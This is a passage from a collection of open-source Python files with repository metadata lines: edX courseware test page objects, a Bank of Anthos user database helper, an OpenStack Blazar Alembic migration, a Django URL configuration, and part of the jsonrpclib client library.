""" Click on Bookmarks button """
self.q(css='.bookmarks-list-button').first.click()
bookmarks_page = BookmarksPage(self.browser, self.course_id)
bookmarks_page.visit()
class CoursewareSequentialTabPage(CoursePage):
"""
Courseware Sequential page
"""
def __init__(self, browser, course_id, chapter, subsection, position):
super(CoursewareSequentialTabPage, self).__init__(browser, course_id)
self.url_path = "courseware/{}/{}/{}".format(chapter, subsection, position)
def is_browser_on_page(self):
return self.q(css='nav.sequence-list-wrapper').present
def get_selected_tab_content(self):
"""
return the body of the sequential currently selected
"""
return self.q(css='#seq_content .xblock').text[0]
class CourseNavPage(PageObject):
"""
Handles navigation on the courseware pages, including sequence navigation and
breadcrumbs.
"""
url = None
def __init__(self, browser, parent_page):
super(CourseNavPage, self).__init__(browser)
self.parent_page = parent_page
# TODO: TNL-6546: Remove the following
self.unified_course_view = False
def is_browser_on_page(self):
return self.parent_page.is_browser_on_page
# TODO: TNL-6546: Remove method, outline no longer on courseware page
@property
def sections(self):
"""
Return a dictionary representation of sections and subsections.
Example:
{
'Introduction': ['Course Overview'],
'Week 1': ['Lesson 1', 'Lesson 2', 'Homework']
'Final Exam': ['Final Exam']
}
You can use these titles in `go_to_section` to navigate to the section.
"""
# Dict to store the result
nav_dict = dict()
section_titles = self._section_titles()
# Get the section titles for each chapter
for sec_index, sec_title in enumerate(section_titles):
if len(section_titles) < 1:
self.warning("Could not find subsections for '{0}'".format(sec_title))
else:
# Add one to convert list index (starts at 0) to CSS index (starts at 1)
nav_dict[sec_title] = self._subsection_titles(sec_index + 1)
return nav_dict
@property
def sequence_items(self):
"""
Return a list of sequence items on the page.
Sequence items are one level below subsections in the course nav.
Example return value:
['Chemical Bonds Video', 'Practice Problems', 'Homework']
"""
seq_css = 'ol#sequence-list>li>.nav-item>.sequence-tooltip'
return self.q(css=seq_css).map(self._clean_seq_titles).results
# TODO: TNL-6546: Remove method, outline no longer on courseware page
def go_to_section(self, section_title, subsection_title):
"""
Go to the section in the courseware.
Every section must have at least one subsection, so specify
both the section and subsection title.
Example:
go_to_section("Week 1", "Lesson 1")
"""
# For test stability, disable JQuery animations (opening / closing menus)
self.browser.execute_script("jQuery.fx.off = true;")
# Get the section by index
try:
sec_index = self._section_titles().index(section_title)
except ValueError:
self.warning("Could not find section '{0}'".format(section_title))
return
# Click the section to ensure it's open (no harm in clicking twice if it's already open)
# Add one to convert from list index to CSS index
section_css = '.course-navigation .chapter:nth-of-type({0})'.format(sec_index + 1)
self.q(css=section_css).first.click()
# Get the subsection by index
try:
subsec_index = self._subsection_titles(sec_index + 1).index(subsection_title)
except ValueError:
msg = "Could not find subsection '{0}' in section '{1}'".format(subsection_title, section_title)
self.warning(msg)
return
# Convert list indices (start at zero) to CSS indices (start at 1)
subsection_css = (
".course-navigation .chapter-content-container:nth-of-type({0}) "
".menu-item:nth-of-type({1})"
).format(sec_index + 1, subsec_index + 1)
# Click the subsection and ensure that the page finishes reloading
self.q(css=subsection_css).first.click()
self._on_section_promise(section_title, subsection_title).fulfill()
def go_to_vertical(self, vertical_title):
"""
Within a section/subsection, navigate to the vertical with `vertical_title`.
"""
# Get the index of the item in the sequence
all_items = self.sequence_items
try:
seq_index = all_items.index(vertical_title)
except ValueError:
msg = "Could not find sequential '{0}'. Available sequentials: [{1}]".format(
vertical_title, ", ".join(all_items)
)
self.warning(msg)
else:
# Click on the sequence item at the correct index
# Convert the list index (starts at 0) to a CSS index (starts at 1)
seq_css = "ol#sequence-list>li:nth-of-type({0})>.nav-item".format(seq_index + 1)
self.q(css=seq_css).first.click()
# Click triggers an ajax event
self.wait_for_ajax()
# TODO: TNL-6546: Remove method, outline no longer on courseware page
def _section_titles(self):
"""
Return a list of all section titles on the page.
"""
chapter_css = '.course-navigation .chapter .group-heading'
return self.q(css=chapter_css).map(lambda el: el.text.strip()).results
# TODO: TNL-6546: Remove method, outline no longer on courseware page
def _subsection_titles(self, section_index):
"""
Return a list of all subsection titles on the page
for the section at index `section_index` (starts at 1).
"""
# Retrieve the subsection title for the section
# Add one to the list index to get the CSS index, which starts at one
subsection_css = (
".course-navigation .chapter-content-container:nth-of-type({0}) "
".menu-item a p:nth-of-type(1)"
).format(section_index)
# If the element is visible, we can get its text directly
# Otherwise, we need to get the HTML
# It *would* make sense to always get the HTML, but unfortunately
# the open tab has some child <span> tags that we don't want.
return self.q(
css=subsection_css
).map(
lambda el: el.text.strip().split('\n')[0] if el.is_displayed() else el.get_attribute('innerHTML').strip()
).results
# TODO: TNL-6546: Remove method, outline no longer on courseware page
def _on_section_promise(self, section_title, subsection_title):
"""
Return a `Promise` that is fulfilled when the user is on
the correct section and subsection.
"""
desc = "currently at section '{0}' and subsection '{1}'".format(section_title, subsection_title)
return EmptyPromise(
lambda: self.is_on_section(section_title, subsection_title), desc
)
def go_to_outline(self):
"""
Navigates using breadcrumb to the course outline on the course home page.
Returns CourseHomePage page object.
"""
# To avoid circular dependency, importing inside the function
from common.test.acceptance.pages.lms.course_home import CourseHomePage
course_home_page = CourseHomePage(self.browser, self.parent_page.course_id)
self.q(css='.path a').click()
course_home_page.wait_for_page()
return course_home_page
@unguarded
def is_on_section(self, section_title, subsection_title):
"""
Return a boolean indicating whether the user is on the section and subsection
with the specified titles.
"""
# TODO: TNL-6546: Remove if/else; always use unified_course_view version (if)
if self.unified_course_view:
# breadcrumb location of form: "SECTION_TITLE > SUBSECTION_TITLE > SEQUENTIAL_TITLE"
bread_crumb_current = self.q(css='.position').text
if len(bread_crumb_current) != 1:
self.warning("Could not find the current bread crumb with section and subsection.")
return False
return bread_crumb_current[0].strip().startswith(section_title + ' > ' + subsection_title + ' > ')
else:
# This assumes that the currently expanded section is the one we're on
# That's true right after we click the section/subsection, but not true in general
# (the user could go to a section, then expand another tab).
current_section_list = self.q(css='.course-navigation .chapter.is-open .group-heading').text
current_subsection_list = self.q(css='.course-navigation .chapter-content-container .menu-item.active a p').text
if len(current_section_list) == 0:
self.warning("Could not find the current section")
return False
elif len(current_subsection_list) == 0:
self.warning("Could not find current subsection")
return False
else:
return (
current_section_list[0].strip() == section_title and
current_subsection_list[0].strip().split('\n')[0] == subsection_title
)
# Regular expression to remove HTML span tags from a string
REMOVE_SPAN_TAG_RE = re.compile(r'</span>(.+)<span')
def _clean_seq_titles(self, element):
"""
Clean HTML of sequence titles, stripping out span tags and returning the first line.
"""
return self.REMOVE_SPAN_TAG_RE.search(element.get_attribute('innerHTML')).groups()[0].strip()
# TODO: TNL-6546: Remove. This is no longer needed.
@property
def active_subsection_url(self):
"""
return the url of the active subsection in the left nav
"""
return self.q(css='.chapter-content-container .menu-item.active a').attrs('href')[0]
# TODO: TNL-6546: Remove all references to self.unified_course_view
# TODO: TNL-6546: Remove the following function
def visit_unified_course_view(self):
# use unified_course_view version of the nav
self.unified_course_view = True
# reload the same page with the unified course view
self.browser.get(self.browser.current_url + "&unified_course_view=1")
self.wait_for_page()
| romain-li/edx-platform | common/test/acceptance/pages/lms/courseware.py | Python | agpl-3.0 | 23,445 | 0.003156 |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
db manages interactions with the underlying database
"""
import logging
import random
from sqlalchemy import create_engine, MetaData, Table, Column, String, Date, LargeBinary
from opentelemetry.instrumentation.sqlalchemy import SQLAlchemyInstrumentor
class UserDb:
"""
UserDb provides a set of helper functions over SQLAlchemy
to handle db operations for userservice
"""
def __init__(self, uri, logger=logging):
self.engine = create_engine(uri)
self.logger = logger
self.users_table = Table(
'users',
MetaData(self.engine),
Column('accountid', String, primary_key=True),
Column('username', String, unique=True, nullable=False),
Column('passhash', LargeBinary, nullable=False),
Column('firstname', String, nullable=False),
Column('lastname', String, nullable=False),
Column('birthday', Date, nullable=False),
Column('timezone', String, nullable=False),
Column('address', String, nullable=False),
Column('state', String, nullable=False),
Column('zip', String, nullable=False),
Column('ssn', String, nullable=False),
)
# Set up tracing autoinstrumentation for sqlalchemy
SQLAlchemyInstrumentor().instrument(
engine=self.engine,
service='users',
)
def add_user(self, user):
"""Add a user to the database.
Params: user - a key/value dict of attributes describing a new user
{'username': username, 'password': password, ...}
Raises: SQLAlchemyError if there was an issue with the database
"""
statement = self.users_table.insert().values(user)
self.logger.debug('QUERY: %s', str(statement))
with self.engine.connect() as conn:
conn.execute(statement)
def generate_accountid(self):
"""Generates a globally unique alphanumerical accountid."""
self.logger.debug('Generating an account ID')
accountid = None
with self.engine.connect() as conn:
while accountid is None:
accountid = str(random.randint(1e9, (1e10 - 1)))
statement = self.users_table.select().where(
self.users_table.c.accountid == accountid
)
self.logger.debug('QUERY: %s', str(statement))
result = conn.execute(statement).first()
# If there already exists an account, try again.
if result is not None:
accountid = None
self.logger.debug('RESULT: account ID already exists. Trying again')
self.logger.debug('RESULT: account ID generated.')
return accountid
def get_user(self, username):
"""Get user data for the specified username.
Params: username - the username of the user
Return: a key/value dict of user attributes,
{'username': username, 'accountid': accountid, ...}
or None if that user does not exist
Raises: SQLAlchemyError if there was an issue with the database
"""
statement = self.users_table.select().where(self.users_table.c.username == username)
self.logger.debug('QUERY: %s', str(statement))
with self.engine.connect() as conn:
result = conn.execute(statement).first()
self.logger.debug('RESULT: fetched user data for %s', username)
return dict(result) if result is not None else None
| GoogleCloudPlatform/bank-of-anthos | src/userservice/db.py | Python | apache-2.0 | 4,158 | 0.000962 |
# Copyright 2021 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""add device reservation
Revision ID: 42c7fd6e792e
Revises: 02e2f2186d98
Create Date: 2021-06-22 15:27:00.239725
"""
# revision identifiers, used by Alembic.
revision = '42c7fd6e792e'
down_revision = '02e2f2186d98'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('devices',
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('name', sa.String(length=255), nullable=False),
sa.Column('device_type',
sa.Enum('container', 'vm', 'shell',
name='allowed_device_types'),
nullable=False),
sa.Column('device_driver', sa.Enum(
'zun', name='allowed_device_drivers'), nullable=False),
sa.Column('reservable', sa.Boolean(),
server_default=sa.text('true'), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('device_extra_capabilities',
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('device_id', sa.String(
length=36), nullable=False),
sa.Column('capability_id', sa.String(
length=255), nullable=False),
sa.Column('capability_value', sa.Text().with_variant(
mysql.MEDIUMTEXT(), 'mysql'), nullable=False),
sa.ForeignKeyConstraint(
['capability_id'], ['extra_capabilities.id'], ),
sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('device_allocations',
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('deleted_at', sa.DateTime(), nullable=True),
sa.Column('deleted', sa.String(length=36), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('device_id', sa.String(
length=36), nullable=True),
sa.Column('reservation_id', sa.String(
length=36), nullable=True),
sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ),
sa.ForeignKeyConstraint(['reservation_id'], [
'reservations.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('device_reservations',
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('deleted_at', sa.DateTime(), nullable=True),
sa.Column('deleted', sa.String(length=36), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('reservation_id', sa.String(
length=36), nullable=True),
sa.Column('count_range', sa.String(
length=36), nullable=True),
sa.Column('resource_properties', sa.Text().with_variant(
mysql.MEDIUMTEXT(), 'mysql'), nullable=True),
sa.Column('before_end', sa.String(
length=36), nullable=True),
sa.ForeignKeyConstraint(['reservation_id'], [
'reservations.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.alter_column('instance_reservations', 'affinity',
existing_type=mysql.TINYINT(display_width=1),
nullable=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('instance_reservations', 'affinity',
existing_type=mysql.TINYINT(display_width=1),
nullable=True)
op.drop_table('device_reservations')
op.drop_table('device_allocations')
op.drop_table('device_extra_capabilities')
op.drop_table('devices')
# ### end Alembic commands ###
| ChameleonCloud/blazar | blazar/db/migration/alembic_migrations/versions/42c7fd6e792e_add_device_reservation.py | Python | apache-2.0 | 5,436 | 0.000552 |
from django.conf.urls import patterns, include, url
from django.contrib import admin
from api import views
admin.autodiscover()
from rest_framework.routers import DefaultRouter
router = DefaultRouter()
router.register(r'headings', views.HeadingViewSet)
router.register(r'users', views.UserViewSet)
urlpatterns = patterns('',
url(r'^', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
) | timokoola/okrest | okrest/okrest/urls.py | Python | apache-2.0 | 449 | 0.008909 |
#!/usr/bin/python
# -- Content-Encoding: UTF-8 --
"""
============================
JSONRPC Library (jsonrpclib)
============================
This library is a JSON-RPC v.2 (proposed) implementation which
follows the xmlrpclib API for portability between clients. It
uses the same Server / ServerProxy, loads, dumps, etc. syntax,
while providing features not present in XML-RPC like:
* Keyword arguments
* Notifications
* Versioning
* Batches and batch notifications
Eventually, I'll add a SimpleXMLRPCServer compatible library,
and other things to tie the thing off nicely. :)
For a quick-start, just open a console and type the following,
replacing the server address, method, and parameters
appropriately.
>>> import jsonrpclib
>>> server = jsonrpclib.Server('http://localhost:8181')
>>> server.add(5, 6)
11
>>> server._notify.add(5, 6)
>>> batch = jsonrpclib.MultiCall(server)
>>> batch.add(3, 50)
>>> batch.add(2, 3)
>>> batch._notify.add(3, 5)
>>> batch()
[53, 5]
See https://github.com/tcalmant/jsonrpclib for more info.
:authors: Josh Marshall, Thomas Calmant
:copyright: Copyright 2020, Thomas Calmant
:license: Apache License 2.0
:version: 0.4.2
..
Copyright 2020 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard library
import contextlib
import logging
import os
import socket
import sys
import uuid
try:
# Python 3
# pylint: disable=F0401,E0611
from http.client import HTTPConnection
from urllib.parse import urlparse
from xmlrpc.client import Transport as XMLTransport
from xmlrpc.client import SafeTransport as XMLSafeTransport
from xmlrpc.client import ServerProxy as XMLServerProxy
from xmlrpc.client import _Method as XML_Method
except ImportError:
# Python 2
# pylint: disable=F0401,E0611
from httplib import HTTPConnection # type: ignore
from urlparse import urlparse # type: ignore
from xmlrpclib import Transport as XMLTransport # type: ignore
from xmlrpclib import SafeTransport as XMLSafeTransport # type: ignore
from xmlrpclib import ServerProxy as XMLServerProxy # type: ignore
from xmlrpclib import _Method as XML_Method # type: ignore
try:
# Check GZip support
import gzip
except ImportError:
# Python can be built without zlib/gzip support
# pylint: disable=C0103
gzip = None # type: ignore
# Library includes
import jsonrpclib.config
import jsonrpclib.jsonclass as jsonclass
import jsonrpclib.utils as utils
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (0, 4, 2)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# Create the logger
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
# JSON library import
try:
# pylint: disable=F0401,E0611
# Using cjson
import cjson # type: ignore
_logger.debug("Using cjson as JSON library")
# Declare cjson methods
def jdumps(obj, encoding="utf-8"): # pylint: disable=unused-argument
"""
Serializes ``obj`` to a JSON formatted string, using cjson.
"""
return cjson.encode(obj)
def jloads(json_string):
"""
Deserializes ``json_string`` (a string containing a JSON document)
to a Python object, using cjson.
"""
return cjson.decode(json_string)
except ImportError:
# pylint: disable=F0401,E0611
# Use json or simplejson
try:
import json
_logger.debug("Using json as JSON library")
except ImportError:
try:
import simplejson as json # type: ignore
_logger.debug("Using simplejson as JSON library")
except ImportError:
_logger.error("No supported JSON library found")
raise ImportError(
"You must have the cjson, json, or simplejson "
"module(s) available."
)
# Declare json methods
if sys.version_info[0] < 3:
def jdumps(obj, encoding="utf-8"):
"""
Serializes ``obj`` to a JSON formatted string.
"""
# Python 2 (explicit encoding)
return json.dumps(obj, encoding=encoding)
else:
# Python 3
def jdumps(obj, encoding="utf-8"): # pylint: disable=unused-argument
"""
Serializes ``obj`` to a JSON formatted string.
"""
# Python 3 (the encoding parameter has been removed)
return json.dumps(obj)
def jloads(json_string):
"""
Deserializes ``json_string`` (a string containing a JSON document)
to a Python object.
"""
return json.loads(json_string)
# ------------------------------------------------------------------------------
# XMLRPClib re-implementations
class ProtocolError(Exception):
"""
JSON-RPC error
ProtocolError.args[0] can be:
* an error message (string)
* a (code, message) tuple
"""
class AppError(ProtocolError):
"""
Application error: the error code is not in the pre-defined ones
AppError.args[0][0]: Error code
AppError.args[0][1]: Error message or trace
AppError.args[0][2]: Associated data
"""
def data(self):
"""
Retrieves the value found in the 'data' entry of the error, or None
:return: The data associated to the error, or None
"""
# Don't know why the pylint error shows up
return self.args[0][2] # pylint: disable=unsubscriptable-object
class TransportError(ProtocolError):
"""
Transport error: a specialized protocol error
"""
def __init__(self, url, errcode, errmsg, msg):
"""
:param url: Target URL
:param errcode: HTTP error code
:param errmsg: HTTP error code description
:param msg: Exception message
"""
ProtocolError.__init__(self, url, errcode, errmsg, msg)
self.url = url
self.errcode = errcode
self.errmsg = errmsg
self.msg = msg
def __repr__(self):
return "<{} for {}: {} {}>".format(
type(self).__name__, self.url, self.errcode, self.errmsg
)
class JSONParser(object):
"""
Default JSON parser
"""
def __init__(self, target):
"""
Associates the target loader to the parser
:param target: a JSONTarget instance
"""
self.target = target
def feed(self, data):
"""
Feeds the associated target with the given data
"""
self.target.feed(data)
@staticmethod
def close():
"""
Does nothing
"""
class JSONTarget(object):
"""
Unmarshalls stream data to a string
"""
def __init__(self):
"""
Sets up the unmarshaller
"""
self.data = []
def feed(self, data):
"""
Stores the given raw data into a buffer
"""
# Store raw data as it might not contain whole wide-character
self.data.append(data)
def close(self):
"""
Unmarshalls the buffered data
"""
if not self.data:
return ""
else:
# Use type to have a valid join (str vs. bytes)
data = type(self.data[0])().join(self.data)
try:
# Convert the whole final string
data = utils.from_bytes(data)
except (TypeError, ValueError):
# Try a pass-through
pass
return data
class TransportMixIn(object):
""" Just extends the XML-RPC transport where necessary. """
# for Python 2.7 support
_connection = None
# List of non-overridable headers
# Use the configuration to change the content-type
readonly_headers = ("content-length", "content-type")
def __init__(self, config=jsonrpclib.config.DEFAULT, context=None):
"""
Sets up the transport
:param config: A JSONRPClib Config instance
"""
# Store the configuration
self._config = config
# Store the SSL context
self.context = context
# Set up the user agent
self.user_agent = config.user_agent
# Additional headers: list of dictionaries
self.additional_headers = []
# Avoid a pep-8 error
self.accept_gzip_encoding = True
self.verbose = False
def push_headers(self, headers):
"""
Adds a dictionary of headers to the additional headers list
:param headers: A dictionary
"""
self.additional_headers.append(headers)
def pop_headers(self, headers):
"""
Removes the given dictionary from the additional headers list.
Also validates that given headers are on top of the stack
:param headers: Headers to remove
:raise AssertionError: The given dictionary is not on the latest stored
in the additional headers list
"""
assert self.additional_headers[-1] == headers
self.additional_headers.pop()
def emit_additional_headers(self, connection):
"""
Puts headers as is in the request, filtered read only headers
:param connection: The request connection
:return: The dictionary of headers added to the connection
"""
additional_headers = {}
# Setup extra headers
# (list of tuples, inherited from xmlrpclib.client.Transport)
# Authentication headers are stored there
try:
extra_headers = self._extra_headers or []
except AttributeError:
# Not available this version of Python (should not happen)
pass
else:
for (key, value) in extra_headers:
additional_headers[key] = value
# Prepare the merged dictionary
for headers in self.additional_headers:
additional_headers.update(headers)
# Normalize keys and values
additional_headers = dict(
(str(key).lower(), str(value))
for key, value in additional_headers.items()
)
# Remove forbidden keys
for forbidden in self.readonly_headers:
additional_headers.pop(forbidden, None)
# Reversed order: in the case of multiple headers value definition,
# the latest pushed has priority
for key, value in additional_headers.items():
connection.putheader(key, value)
return additional_headers
def single_request(self, host, handler, request_body, verbose=0):
"""
Send a complete request, and parse the response.
From xmlrpclib in Python 2.7
:param host: Target host.
:param handler: Target RPC handler.
:param request_body: JSON-RPC request body.
:param verbose: Debugging flag.
:return: Parsed response.
"""
connection = self.make_connection(host)
try:
self.send_request(connection, handler, request_body, verbose)
self.send_content(connection, request_body)
response = connection.getresponse()
if response.status == 200:
self.verbose = verbose
return self.parse_response(response)
except:
# All unexpected errors leave connection in
# a strange state, so we clear it.
self.close()
raise
# Discard any response data and raise exception
if response.getheader("content-length", 0):
response.read()
raise TransportError(
host + handler, response.status, response.reason, response.msg
)
def send_request(self, connection, handler, request_body, debug=0):
"""
Send HTTP request.
From xmlrpc.client in Python 3.4
:param connection: Connection handle.
:param handler: Target RPC handler (a path relative to host)
:param request_body: The JSON-RPC request body
:param debug: Enable debugging if debug is true.
:return: An HTTPConnection.
"""
if debug:
connection.set_debuglevel(1)
if self.accept_gzip_encoding and gzip:
connection.putrequest("POST", handler, skip_accept_encoding=True)
connection.putheader("Accept-Encoding", "gzip")
else:
connection.putrequest("POST", handler)
return connection
def send_content(self, connection, request_body):
"""
Completes the request headers and sends the request body of a JSON-RPC
request over a HTTPConnection
:param connection: An HTTPConnection object
:param request_body: JSON-RPC request body
"""
# Convert the body first
request_body = utils.to_bytes(request_body)
# "static" headers
connection.putheader("Content-Type", self._config.content_type)
connection.putheader("Content-Length", str(len(request_body)))
# Emit additional headers here in order not to override content-length
additional_headers = self.emit_additional_headers(connection)
# Add the user agent, if not overridden
if "user-agent" not in additional_headers:
connection.putheader("User-Agent", self.user_agent)
connection.endheaders()
if request_body:
connection.send(request_body)
@staticmethod
def getparser():
"""
Create an instance of the parser, and attach it to an unmarshalling
object. Return both objects.
:return: The parser and unmarshaller instances
"""
target = JSONTarget()
return JSONParser(target), target
class Transport(TransportMixIn, XMLTransport):
"""
Mixed-in HTTP transport
"""
def __init__(self, config):
TransportMixIn.__init__(self, config)
XMLTransport.__init__(self)
class SafeTransport(TransportMixIn, XMLSafeTransport):
"""
Mixed-in HTTPS transport
"""
def __init__(self, config, context):
TransportMixIn.__init__(self, config, context)
try:
# Give the context to XMLSafeTransport, to avoid it setting the
# context to None.
# See https://github.com/tcalmant/jsonrpclib/issues/39
XMLSafeTransport.__init__(self, context=context)
except TypeError:
# On old versions of Python (Pre-2014), the context argument
# wasn't available
XMLSafeTransport.__init__(self)
# ------------------------------------------------------------------------------
class UnixHTTPConnection(HTTPConnection):
"""
Replaces the connect() method of HTTPConnection to use a Unix socket
"""
def __init__(self, path, *args, **kwargs):
"""
Constructs the HTTP connection.
Forwards all given arguments except ``path`` to the constructor of
HTTPConnection
:param path: Path to the Unix socket
"""
# Use localhost as the hostname since a HTTP/1.1 client MUST send a
# 'Host:' header.
HTTPConnection.__init__(self, "localhost", *args, **kwargs)
self.path = path
def connect(self):
"""
Connects to the described server
"""
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(self.path)
class UnixTransport(TransportMixIn, XMLTransport):
"""
Mixed-in HTTP transport over a UNIX socket
"""
def __init__(self, config, path=None):
"""
:param config: The jsonrpclib configuration
:param path: Path to the Unix socket (overrides the host name later)
"""
TransportMixIn.__init__(self, config)
XMLTransport.__init__(self)
# Keep track of the given path, if any
self.__unix_path = os.path.abspath(path) if path else None
def make_connection(self, host):
"""
Connect to server.
Return an existing connection if possible.
This allows HTTP/1.1 keep-alive.
Code copied from xmlrpc.client (Python 3)
:param host: Target host (ignored if a path was given)
:return A UnixHTTPConnection object
"""
if self.__unix_path:
host = self.__unix_path
if self._connection and host == self._connection[0]:
return self._connection[1]
# create a HTTP connection object from a host descriptor
path, self._extra_headers, _ = self.get_host_info(host)
self._connection = host, UnixHTTPConnection(path)
return self._connection[1]
# ------------------------------------------------------------------------------
class ServerProxy(XMLServerProxy):
"""
Unfortunately, much more of this class has to be copied since
so much of it does the serialization.
"""
def __init__(
self,
uri,
transport=None,
encoding=None,
verbose=0,
version=None,
headers=None,
history=None,
config=jsonrpclib.config.DEFAULT,
context=None,
):
"""
Sets up the server proxy
:param uri: Request URI
:param transport: Custom transport handler
:param encoding: Specified encoding
:param verbose: Log verbosity level
:param version: JSON-RPC specification version
:param headers: Custom additional headers for each request
:param history: History object (for tests)
:param config: A JSONRPClib Config instance
:param context: The optional SSLContext to use
"""
# Store the configuration
self._config = config
self.__version = version or config.version
su = urlparse(uri)
schema = su.scheme
self.__host = su.netloc
self.__handler = su.path
use_unix = False
if schema.startswith("unix+"):
schema = schema[len("unix+") :]
use_unix = True
if schema not in ("http", "https"):
_logger.error(
"jsonrpclib only support http(s) URIs, not %s", schema
)
raise IOError("Unsupported JSON-RPC protocol.")
if use_unix:
unix_path = self.__handler
self.__handler = "/"
elif not self.__handler:
# Not sure if this is in the JSON spec?
self.__handler = "/"
if transport is None:
if use_unix:
if schema == "http":
# In Unix mode, we use the path part of the URL (handler)
# as the path to the socket file
transport = UnixTransport(config=config, path=unix_path)
elif schema == "https":
transport = SafeTransport(config=config, context=context)
else:
transport = Transport(config=config)
if transport is None:
raise IOError(
"Unhandled combination: UNIX={}, protocol={}".format(
use_unix, schema
)
)
self.__transport = transport
self.__encoding = encoding
self.__verbose = verbose
self.__history = history
# Global custom headers are injected into Transport
self.__transport.push_headers(headers or {})
def _request(self, methodname, params, rpcid=None):
"""
Calls a method on the remote server
:param methodname: Name of the method to call
:param params: Method parameters
:param rpcid: ID of the remote call
:return: The parsed result of the call
"""
request = dumps(
params,
methodname,
encoding=self.__encoding,
rpcid=rpcid,
version=self.__version,
config=self._config,
)
response = self._run_request(request)
check_for_errors(response)
return response["result"]
def _request_notify(self, methodname, params, rpcid=None):
"""
Calls a method as a notification
:param methodname: Name of the method to call
:param params: Method parameters
:param rpcid: ID of the remote call
"""
request = dumps(
params,
methodname,
encoding=self.__encoding,
rpcid=rpcid,
version=self.__version,
notify=True,
config=self._config,
)
response = self._run_request(request, notify=True)
check_for_errors(response)
def _run_request(self, request, notify=False):
"""
Sends the given request to the remote server
:param request: The request to send
:param notify: Notification request flag (unused)
:return: The response as a parsed JSON object
"""
if self.__history is not None:
self.__history.add_request(request)
response = self.__transport.request(
self.__host, self.__handler, request, verbose=self.__verbose
)
# Here, the XMLRPC library translates a single list
# response to the single value -- should we do the
# same, and require a tuple / list to be passed to
# the response object, or expect the Server to be
# outputting the response appropriately?
if self.__history is not None:
self.__history.add_response(response)
if not response:
return None
else:
return_obj = loads(response, self._config)
return return_obj
def __getattr__(self, name):
"""
Returns a callable object to call the remote service
"""
if name.startswith("__") and name.endswith("__"):
# Don't proxy special methods.
raise AttributeError("ServerProxy has no attribute '%s'" % name)
# Same as original, just with new _Method reference
return _Method(self._request, name)
def __close(self):
"""
Closes the transport layer
"""
self.__transport.close()
def __call__(self, attr):
"""
A workaround to get special attributes on the ServerProxy
without interfering with the magic __getattr__
(code from xmlrpclib in Python 2.7)
"""
if attr == "close":
return self.__close
elif attr == "transport":
return self.__transport
raise AttributeError("Attribute {0} not found".format(attr))
@property
def _notify(self):
"""
Like __getattr__, but sending a notification request instead of a call
"""
return _Notify(self._request_notify)
@contextlib.contextmanager
def _additional_headers(self, headers):
"""
Allows to specify additional headers, to be added inside the with
block.
Example of usage:
>>> with client._additional_headers({'X-Test' : 'Test'}) as new_client:
... new_client.method()
...
>>> # Here old headers are restored
"""
self.__transport.push_headers(headers)
yield self
self.__transport.pop_headers(headers)
# ------------------------------------------------------------------------------
class _Method(XML_Method):
"""
Some magic to bind an JSON-RPC method to an RPC server.
"""
def __call__(self, *args, **kwargs):
"""
Sends an RPC request and returns the unmarshalled result
"""
if args and kwargs:
raise ProtocolError(
"Cannot use both positional and keyword "
"arguments (according to JSON-RPC spec.)"
)
if args:
return self.__send(self.__name, args)
else:
return self.__send(self.__name, kwargs)
def __getattr__(self, name):
"""
Returns a Method object for nested calls
"""
if name == "__name__":
return self.__name
return _Method(self.__send, "{0}.{1}".format(self.__name, name))
def __repr__(self):
"""
Returns a string representation of the method
"""
# Must use __class__ here because the base class is old-style.
return "<{0} {1}>".format(self.__class__, self.__name)
class _Notify(object):
"""
Same as _Method, but to send notifications
"""
def __init__(self, request):
"""
Sets the method to call to send a request to the server
"""
self._request = request
def __getattr__(self, name):
"""
Returns a Method object, to be called as a notification
"""
return _Method(self._request, name)
# ------------------------------------------------------------------------------
# Batch implementation
class MultiCallMethod(object):
"""
Stores calls made to a MultiCall object for batch execution
"""
def __init__(self, method, notify=False, config=jsonrpclib.config.DEFAULT):
"""
Sets up the store
:param method: Name of the method to call
:param notify: Notification flag
